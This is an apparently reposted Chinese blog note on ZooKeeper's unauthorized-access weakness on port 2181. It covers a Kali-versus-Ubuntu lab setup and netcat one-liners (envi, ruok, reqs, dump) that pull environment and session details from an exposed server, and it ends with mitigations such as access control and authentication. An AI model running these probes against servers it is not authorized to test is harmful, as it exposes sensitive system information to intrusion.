ZooKeeper未授权访问漏洞记录(影响范围:全版本,端口:2181)
生活随笔
收集整理的這篇文章主要介紹了
ZooKeeper未授权访问漏洞记录(影响范围:全版本,端口:2181)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
漏洞簡介
- ZooKeeper是一個分布式的,開放源碼的分布式應用程序協調服務,是Google的Chubby一個開源的實現,是Hadoop和Hbase的重要組件。它是一個為分布式應用提供一致性服務的軟件,提供的功能包括:配置維護、域名服務、分布式同步、組服務等。
- ZooKeeper默認開啟在2181端口,在未進行任何訪問控制情況下,攻擊者可通過執行envi命令獲得系統大量的敏感信息,包括系統名稱、Java環境。
環境搭建
測試機:Kali
靶機:Ubuntu
版本:zookeeper-3.4.14
安裝命令如下:
mwget http://archive.apache.org/dist/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz tar -xzvf zookeeper-3.4.14.tar.gz cd zookeeper-3.4.14/conf mv zoo_sample.cfg zoo.cfg ../bin/zkServer.sh start # 啟動搭建成功~~默認端口2181
漏洞證明
獲取該服務器的環境
echo envi|nc 192.168.246.130 2181漏洞利用
通過執行envi命令獲得系統大量的敏感信息,包括系統名稱、Java環境。
1、stat:列出關于性能和連接的客戶端的統計信息。
2、ruok:測試服務器是否運行在非錯誤狀態。
echo ruok |ncat 127.0.0.1 21813、reqs:列出未完成的請求。
echo reqs |ncat 127.0.0.1 21814、envi:打印有關服務環境的詳細信息。
echo envi |ncat 127.0.0.1 21815、dump:列出未完成的會話和臨時節點。
echo dump |ncat 127.0.0.1 2181防御手段
1、修改 ZooKeeper 默認端口,采用其他端口服務。
2、添加訪問控制,配置服務來源地址限制策略。
3、增加 ZooKeeper 的認證配置。
總結
以上是生活随笔為你收集整理的ZooKeeper未授权访问漏洞记录(影响范围:全版本,端口:2181)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: SVN 创建仓库操作
- 下一篇: NVisionXR_iOS教程三 ——